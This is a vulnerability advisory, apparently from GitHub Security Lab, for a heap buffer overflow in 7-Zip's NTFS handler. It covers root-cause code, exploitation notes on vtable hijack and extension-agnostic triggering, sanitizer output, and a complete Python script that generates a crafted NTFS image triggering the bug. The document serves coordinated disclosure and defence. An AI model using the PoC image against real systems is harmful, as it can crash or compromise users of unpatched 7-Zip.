Coordinated Disclosure Timeline
- 2026-04-24: The report was delivered as a private SourceForge issue.
- 2026-04-27: v26.01 with a fix was released.
Summary
A heap buffer overflow vulnerability (GHSL-2026-140) exists in 7-Zip version 26.00, caused by an under-allocation in the NTFS compressed stream buffer (GetCuSize shift UB), potentially allowing attackers to exploit this issue for arbitrary code execution or application crashes.
Project
7-Zip
Tested Version
Details
Heap buffer overflow via NTFS compressed stream buffer under-allocation (GetCuSize shift UB) (GHSL-2026-140)
A heap buffer overflow vulnerability exists in the NTFS archive handler in 7-Zip that can lead to code execution via vtable hijack. The CInStream::GetCuSize() function computes the NTFS compression-unit buffer size using a 32-bit shift (UInt32)1 << (BlockSizeLog + CompressionUnit). When an attacker-crafted NTFS image sets ClusterSizeLog >= 28 (accepted by the parser) and a compressed data attribute with CompressionUnit == 4, the shift exponent reaches 32 — undefined behavior in C++. On both x86 and x64, the UB causes _inBuf to be allocated as 1 byte. The subsequent ReadStream_FALSE writes 256 MB of attacker-controlled data into this 1-byte buffer.
The NTFS boot sector parser accepts cluster sizes up to 2^30 bytes (CPP/7zip/Archive/NtfsHandler.cpp, line 133):
// NtfsHandler.cpp, lines 122-134
const unsigned v = p[13];
if (v <= 0x80)
{
const int t = GetLog(v);
if (t < 0) return false;
sectorsPerClusterLog = (unsigned)t;
}
else
sectorsPerClusterLog = 0x100 - v;
ClusterSizeLog = SectorSizeLog + sectorsPerClusterLog;
if (ClusterSizeLog > 30) // allows 28, 29, 30
return false;
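To make the accepted range concrete, the following is a minimal Python sketch of the branch logic quoted above. It is a model for illustration, not 7-Zip code: the names `get_log` and `cluster_size_log` are hypothetical, `get_log` is assumed to return -1 for anything that is not an exact power of two, and the sector size is assumed to be 512 bytes (SectorSizeLog = 9), as in the PoC boot sector.

```python
SECTOR_SIZE_LOG = 9  # assumption: 512-byte sectors, as in the PoC boot sector


def get_log(value):
    """Assumed behaviour of GetLog(): log2 of an exact power of two, else -1."""
    if value > 0 and value & (value - 1) == 0:
        return value.bit_length() - 1
    return -1


def cluster_size_log(sectors_per_cluster_byte, sector_size_log=SECTOR_SIZE_LOG):
    """Model the quoted parser branch; return None where the parser rejects."""
    v = sectors_per_cluster_byte
    if v <= 0x80:
        t = get_log(v)
        if t < 0:
            return None
        sectors_per_cluster_log = t
    else:
        # "Negative" encoding: the byte stores 0x100 - log2(sectors per cluster).
        sectors_per_cluster_log = 0x100 - v
    result = sector_size_log + sectors_per_cluster_log
    if result > 30:
        return None
    return result
```

Under these assumptions, `cluster_size_log(0xED)` evaluates to 28, the value the PoC relies on, while `cluster_size_log(0xEA)` (which would give 31) is rejected.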
Non-resident compressed data attributes carry CompressionUnit from the attacker-controlled attribute header (NtfsHandler.cpp:509). The value CompressionUnit == 4 is explicitly accepted (NtfsHandler.cpp:430).
The compressed stream’s buffer size is computed as:
// NtfsHandler.cpp, line 687
UInt32 GetCuSize() const { return (UInt32)1 << (BlockSizeLog + CompressionUnit); }
When BlockSizeLog == 28 and CompressionUnit == 4, the exponent is 32, which is undefined behavior in C++ (shift count >= the width of the type). On x86 and x64, (UInt32)1 << 32 typically evaluates to 1 because the hardware masks 32-bit shift counts to their low 5 bits.
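The arithmetic can be modelled in a few lines of Python. This is only a sketch of the typical hardware outcome: the helper names are hypothetical, and `shl_masked` assumes the count is reduced modulo the operand width, as x86/x64 shift instructions do. Because the C++ expression is undefined, a compiler is not obliged to produce this result.

```python
def shift_is_defined(exponent, type_bits=32):
    """A C++ left shift is only defined for 0 <= exponent < type width."""
    return 0 <= exponent < type_bits


def shl_masked(value, exponent, type_bits=32):
    """Model a shift whose count is masked to the operand width.

    Assumption: x86/x64-style masking (count modulo 32 for 32-bit operands).
    """
    mask = (1 << type_bits) - 1
    return (value << (exponent % type_bits)) & mask


def get_cu_size_model(block_size_log, compression_unit):
    """Model of (UInt32)1 << (BlockSizeLog + CompressionUnit)."""
    return shl_masked(1, block_size_log + compression_unit, 32)
```

With an ordinary 4 KB cluster, `get_cu_size_model(12, 4)` gives the expected 65536. With the values from the crafted image, `shift_is_defined(28 + 4)` is false and `get_cu_size_model(28, 4)` collapses to 1.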
The undersized buffer is then used:
// NtfsHandler.cpp, lines 695-697
UInt32 cuSize = GetCuSize(); // UB → 1 byte on x86/x64
_inBuf.Alloc(cuSize); // allocates 1 byte
_outBuf.Alloc(kNumCacheChunks << _chunkSizeLog); // x86: 2 bytes; x64: 8 GB (succeeds on >= 16 GB RAM)
NTFS uses LZNT1 compression. The two buffers serve a standard decompress pipeline:
- _inBuf: holds raw compressed data read from disk (via ReadStream_FALSE)
- _outBuf: holds decompressed output from Lznt1Dec(), also used as a read cache
The normal flow is: disk → _inBuf → Lznt1Dec() → _outBuf → memcpy to caller. Both buffers should be GetCuSize() bytes (one compression unit). Due to the shift UB, _inBuf gets 1 byte instead of the intended size, so the very first step — reading compressed data from disk into _inBuf — overflows:
// NtfsHandler.cpp, lines 940-941
const size_t compressed = (size_t)numChunks << BlockSizeLog; // up to 256 MB
RINOK(ReadStream_FALSE(Stream, _inBuf + offs, compressed)) // writes into 1-byte buffer
Note that the overflow target is _inBuf, not _outBuf. On x64, even when the 8 GB _outBuf allocation succeeds, the 1-byte _inBuf is still overflowed, because the two buffer sizes are computed independently: _inBuf from the 32-bit GetCuSize() shift (undefined), and _outBuf from a size_t shift that is well-defined on 64-bit builds.
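One way to reason about what a guard against this class of bug needs to check is sketched below in Python. This is not the fix shipped in v26.01, whose details are not described here; `MAX_CU_SIZE_LOG`, `UnsupportedLayout`, `checked_cu_size`, and `checked_read_length` are hypothetical names chosen for illustration.

```python
MAX_CU_SIZE_LOG = 31  # hypothetical limit: largest exponent valid for a 32-bit shift


class UnsupportedLayout(ValueError):
    """Raised when the image describes sizes the reader cannot represent."""


def checked_cu_size(block_size_log, compression_unit):
    """Compute the compression-unit size, rejecting out-of-range exponents."""
    exponent = block_size_log + compression_unit
    if exponent > MAX_CU_SIZE_LOG:
        raise UnsupportedLayout(f"compression unit exponent {exponent} is too large")
    return 1 << exponent


def checked_read_length(num_chunks, block_size_log, buffer_size, offset=0):
    """Return the read length only if it fits in the destination buffer."""
    length = num_chunks << block_size_log
    if offset + length > buffer_size:
        raise UnsupportedLayout(
            f"read of {length} bytes at offset {offset} exceeds a {buffer_size}-byte buffer"
        )
    return length
```

The sketch checks two independent invariants: the exponent must be representable before the size is computed, and every read length must be compared against the size that was actually allocated. Either check alone would stop the write described above.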
Platform-dependent behavior
On 32-bit builds, (size_t)2 << 32 is also UB (size_t is 32-bit), yielding 2 via hardware masking. Both _inBuf.Alloc(1) and _outBuf.Alloc(2) succeed with tiny allocations, and the heap overflow is unconditionally reached.
On 64-bit builds, (size_t)2 << 32 is a valid 64-bit shift yielding 8,589,934,592 (8 GB). The _outBuf.Alloc(8 GB) call succeeds on systems with sufficient RAM (confirmed on a 64 GB machine). After the allocation succeeds, execution proceeds to ReadStream_FALSE and the same heap overflow occurs. On low-memory systems, the allocation may fail with CNewException, limiting the impact to DoS.
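The two cases can be compared side by side with a small model. This Python sketch assumes masked-shift behaviour for the undefined shifts (the typical x86/x64 outcome, not a guarantee) and takes the cache chunk count of 2 from the `(size_t)2 << 32` expression above; the function and key names are hypothetical.

```python
K_NUM_CACHE_CHUNKS = 2  # taken from the "(size_t)2 << 32" expression in the text


def masked_shl(value, exponent, bits):
    """Shift with the count reduced modulo the operand width (assumed behaviour)."""
    return (value << (exponent % bits)) & ((1 << bits) - 1)


def modelled_allocations(block_size_log, compression_unit, size_t_bits):
    """Return modelled buffer sizes and the first read length, in bytes."""
    chunk_size_log = block_size_log + compression_unit
    return {
        # GetCuSize() is always a 32-bit shift, regardless of platform.
        "in_buf": masked_shl(1, chunk_size_log, 32),
        # The _outBuf size is a size_t shift, so its width follows the build.
        "out_buf": masked_shl(K_NUM_CACHE_CHUNKS, chunk_size_log, size_t_bits),
        # One chunk (numChunks == 1) of BlockSizeLog bytes is read into _inBuf.
        "first_read": 1 << block_size_log,
    }
```

For the crafted image, `modelled_allocations(28, 4, 32)` gives a 1-byte `in_buf` and a 2-byte `out_buf`, while `modelled_allocations(28, 4, 64)` gives the same 1-byte `in_buf` with an `out_buf` of 8,589,934,592 bytes. In both cases `first_read` is 268,435,456 bytes.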
Impact
- Heap buffer overflow leading to vtable hijack (potential code execution): 256 MB is written into a 1-byte heap buffer. ReadStream_FALSE calls stream->Read() in a loop (64 KB per iteration via kBlockSize). Debugger analysis on a release /O1 build (identical codegen to the official binary) shows that the stream object (CInStream) is allocated only 304 bytes (0x130) after _inBuf on the heap. The first Read() iteration writes 64 KB of attacker-controlled data starting at _inBuf, overwriting the stream object’s vtable pointer after just 304 bytes. The second Read() iteration dispatches through the corrupted vtable, a classic vtable hijack. The attacker controls the written data (NTFS cluster content from the crafted image), so they control the overwritten vtable pointer.
- Both x86 and x64 builds are affected. On x64, the overflow is reached on any system where the 8 GB _outBuf allocation succeeds (common on modern systems with >= 16 GB RAM).
- On Windows, ReadFile fails if it detects an unmapped or guard page in the destination range before copying the controlled bytes. Attackers may need Heap Feng Shui to place _inBuf so the overwrite reaches adjacent objects without immediately faulting.
- The NTFS handler is enabled in stock 7z.dll and is registered for .ntfs and .img extensions. However, 7-Zip uses signature-based fallback detection: when the format matching the file extension fails to open, all remaining handlers are tried in signature-priority order. Because the NTFS handler matches on the "NTFS " signature at byte offset 3 (REGISTER_ARC_I in NtfsHandler.cpp:2889), a crafted NTFS image with any file extension, including .7z, .zip, .rar, or no extension at all, will be opened by the NTFS handler after the extension-matched handler rejects it. This means the attack surface is not limited to files with NTFS-associated extensions.
- Triggers during extraction/testing of a compressed file from the crafted image.
- No user interaction beyond opening the crafted image.
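Because the handler is selected by content rather than by extension, triage that relies on file names alone will miss such images. The Python sketch below shows a content-based check. It compares only the 8-byte NTFS OEM ID (`NTFS` padded with four spaces) at offset 3, which is an assumption about what is sufficient for triage: the signature 7-Zip registers may cover additional bytes. The helper names are hypothetical.

```python
NTFS_OEM_ID = b"NTFS    "  # "NTFS" followed by four spaces (8 bytes)
OEM_ID_OFFSET = 3


def looks_like_ntfs(header):
    """Return True if the buffer carries the NTFS OEM ID at byte offset 3."""
    end = OEM_ID_OFFSET + len(NTFS_OEM_ID)
    return header[OEM_ID_OFFSET:end] == NTFS_OEM_ID


def file_looks_like_ntfs(path):
    """Check the first sector of a file, regardless of its extension."""
    with open(path, "rb") as f:
        return looks_like_ntfs(f.read(512))
```

A mail or upload filter could call `file_looks_like_ntfs()` on attachments named `.7z` or `.zip` and treat a match as a mismatch between declared and actual format.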
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.8 (High)
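The score can be reproduced from the vector with the CVSS v3.1 base-score equations. The Python sketch below implements only the scope-unchanged case, which is all this vector needs; the function names are hypothetical and the metric weights are those published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR values are for scope unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a scope-unchanged CVSS v3.1 vector."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise NotImplementedError("this sketch only handles S:U")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))
```

For the vector above, `base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H")` evaluates to 8.8. The UI:R term is what separates it from the 9.8 that the same vector would receive with UI:N.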
Affected versions: The GetCuSize() computation has been present since NTFS compressed stream support was introduced. All versions through 26.00 are affected.
CWEs
- CWE-787: “Out-of-bounds Write”
- CWE-190: “Integer Overflow or Wraparound”
Resources
PoC generator (gen_ntfs_sparse.py) — generates poc_ntfs_sparse.ntfs (512 MB sparse NTFS image, ~8 KB actual data):
#!/usr/bin/env python3
"""Generate a sparse NTFS image with ClusterSizeLog=28 and a compressed
$DATA attribute with CompressionUnit=4 to trigger GetCuSize() UB."""
import struct, os, sys
boot = bytearray(512)
boot[0:3] = b'\xEB\x52\x90'
boot[3:11] = b'NTFS    '  # 8-byte OEM ID ("NTFS" + 4 spaces); a shorter value would shrink the bytearray
struct.pack_into('<H', boot, 11, 512)
boot[13] = 0xED # ClusterSizeLog = 28
for i in range(14, 21): boot[i] = 0
boot[21] = 0xF8
struct.pack_into('<H', boot, 24, 63)
struct.pack_into('<H', boot, 26, 255)
struct.pack_into('<Q', boot, 40, 2 << 19) # TotalSectors
struct.pack_into('<Q', boot, 48, 1) # MftCluster=1 -> offset 256MB
boot[64] = 0xF6
boot[68] = 0xF6
struct.pack_into('<Q', boot, 72, 0x1234567890ABCDEF)
boot[510] = 0x55; boot[511] = 0xAA
MFT_REC = 1024
def mft_rec(seq, flags, attrs, rec_num=0):
    r = bytearray(MFT_REC)
    r[0:4] = b'FILE'
    struct.pack_into('<H', r, 4, 0x30) # UpdateSequenceOffset
    struct.pack_into('<H', r, 6, 3) # UpdateSequenceSize
    struct.pack_into('<Q', r, 8, 0)
    struct.pack_into('<H', r, 16, seq)
    struct.pack_into('<H', r, 18, 1)
    struct.pack_into('<H', r, 20, 0x38)
    struct.pack_into('<H', r, 22, flags)
    bytes_in_use = (0x38 + len(attrs) + 8 + 7) & ~7
    struct.pack_into('<I', r, 24, bytes_in_use)
    struct.pack_into('<I', r, 28, MFT_REC)
    struct.pack_into('<I', r, 0x2C, rec_num)
    r[0x38:0x38+len(attrs)] = attrs
    struct.pack_into('<I', r, 0x38+len(attrs), 0xFFFFFFFF)
    usn = 0x0001
    struct.pack_into('<H', r, 0x30, usn)
    orig0 = struct.unpack_from('<H', r, 510)[0]
    orig1 = struct.unpack_from('<H', r, 1022)[0]
    struct.pack_into('<H', r, 0x32, orig0)
    struct.pack_into('<H', r, 0x34, orig1)
    struct.pack_into('<H', r, 510, usn)
    struct.pack_into('<H', r, 1022, usn)
    return r
def std_info():
    d = bytearray(48)
    a = bytearray(24 + len(d))
    struct.pack_into('<I', a, 0, 0x10)
    struct.pack_into('<I', a, 4, len(a))
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(d))
    a[24:24+len(d)] = d
    return a
def filename(name):
    nu = name.encode('utf-16-le')
    fn = bytearray(66 + len(nu))
    struct.pack_into('<Q', fn, 0, 5)
    fn[64] = len(name)
    fn[65] = 3
    fn[66:66+len(nu)] = nu
    raw_len = 24 + len(fn)
    padded_len = (raw_len + 7) & ~7
    a = bytearray(padded_len)
    struct.pack_into('<I', a, 0, 0x30)
    struct.pack_into('<I', a, 4, padded_len)
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(fn))
    a[24:24+len(fn)] = fn
    return a
def compressed_data():
    rl = bytes([0x11, 0x01, 0x01, 0x00]) # 1 cluster at LCN 1
    hdr_size = 0x48
    sz = (hdr_size + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 0x10, 0) # LowVcn
    struct.pack_into('<Q', a, 0x18, 0) # HighVcn
    struct.pack_into('<H', a, 0x20, hdr_size) # RunlistOffset
    a[0x22] = 4 # CompressionUnit = 4
    cs = 1 << 28
    struct.pack_into('<Q', a, 0x28, cs) # AllocatedSize
    struct.pack_into('<Q', a, 0x30, 100) # Size
    struct.pack_into('<Q', a, 0x38, 100) # InitializedSize
    struct.pack_into('<Q', a, 0x40, cs) # PackSize
    a[hdr_size:hdr_size+len(rl)] = rl
    return a
def mft_data_attr(num_records):
    rl = bytes([0x11, 0x01, 0x01, 0x00])
    sz = (72 + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 16, 0)
    struct.pack_into('<Q', a, 24, 0)
    struct.pack_into('<H', a, 32, 0x40)
    struct.pack_into('<H', a, 34, 0) # CompressionUnit = 0
    data_size = num_records * MFT_REC
    struct.pack_into('<Q', a, 40, 1 << 28)
    struct.pack_into('<Q', a, 48, data_size)
    struct.pack_into('<Q', a, 56, data_size)
    a[0x40:0x40+len(rl)] = rl
    return a
num_mft_records = 7
mft = mft_rec(1, 1, std_info() + mft_data_attr(num_mft_records), rec_num=0)
for i in range(1, 5):
    mft += mft_rec(i+1, 1, std_info(), rec_num=i)
mft += mft_rec(1, 3, std_info(), rec_num=5) # root dir
mft += mft_rec(1, 1, std_info() + filename("test.txt") + compressed_data(), rec_num=6)
mft_off = 1 << 28 # 256 MB
phy_size = 2 << 28 # 512 MB
out = sys.argv[1] if len(sys.argv) > 1 else "poc_ntfs_sparse.ntfs"
with open(out, 'wb') as f:
    f.write(boot)
    f.seek(mft_off)
    f.write(mft)
    f.seek(phy_size - 1)
    f.write(b'\x00')
print(f"Generated: {out} ({os.stat(out).st_size} bytes apparent)")
Usage: python3 gen_ntfs_sparse.py [output_path]
The PoC constructs a hand-crafted NTFS image with ClusterSizeLog = 28 (256 MB clusters), 7 MFT records at offset 256 MB, and a compressed $DATA attribute with CompressionUnit = 4. No existing NTFS formatting tool (mkntfs) supports clusters larger than 64 KB, so the entire MFT structure is synthesized from scratch with correct:
- Boot sector with SectorsPerCluster = 0xED (negative encoding for ClusterSizeLog = 28)
- USN fixup arrays at sector boundaries
- 8-byte-aligned attribute records ($STANDARD_INFORMATION, $FILE_NAME, $DATA)
- Non-resident $DATA runlists within NumClusters bounds
- Compressed attribute header with PackSize field at offset 0x40
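The USN fixup item is the least obvious of these. An NTFS reader expects the last two bytes of every 512-byte sector in a record to hold the update sequence number, with the displaced original bytes saved in an array in the record header. The Python sketch below shows the reader-side check that the PoC's records have to satisfy. It illustrates the general NTFS mechanism, not 7-Zip's implementation, and `apply_fixups` is a hypothetical name.

```python
import struct

SECTOR = 512  # fixups protect the last two bytes of each 512-byte sector


def apply_fixups(record):
    """Verify and undo the update-sequence fixups of one FILE record.

    Header layout used here: a 16-bit array offset at byte 4 and a 16-bit
    entry count at byte 6 (one USN entry plus one saved word per sector).
    """
    rec = bytearray(record)
    usa_offset, usa_count = struct.unpack_from("<HH", rec, 4)
    usn = rec[usa_offset:usa_offset + 2]
    for i in range(1, usa_count):
        tail = i * SECTOR - 2
        if rec[tail:tail + 2] != usn:
            raise ValueError(f"fixup mismatch in sector {i - 1}")
        # Restore the original bytes that the USN displaced.
        saved = usa_offset + 2 * i
        rec[tail:tail + 2] = rec[saved:saved + 2]
    return rec
```

This corresponds to what `mft_rec()` in the generator prepares: it writes the USN at offset 0x30, stores the original words at 0x32 and 0x34, and stamps the USN at offsets 510 and 1022 of the 1024-byte record.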
Verification
Confirmed with UBSan.
UBSan (clang, Linux x64, recovery mode)
Confirms the root-cause shift UB regardless of platform:
../../Archive/NtfsHandler.cpp:687:47: runtime error: shift exponent 32 is too large
for 32-bit type 'UInt32' (aka 'unsigned int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior
../../Archive/NtfsHandler.cpp:687:47
After the UB, cascading corruption leads to a SEGV:
../../Common/StreamUtils.cpp:62:27: runtime error: member call on address 0x5d3dd8f776f0
which does not point to an object of type 'ISequentialInStream'
note: object has invalid vptr
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==60==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000018
==60==Hint: address points to the zero page.
CVE
- CVE-2026-48095
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2026-140 in any communication regarding this issue.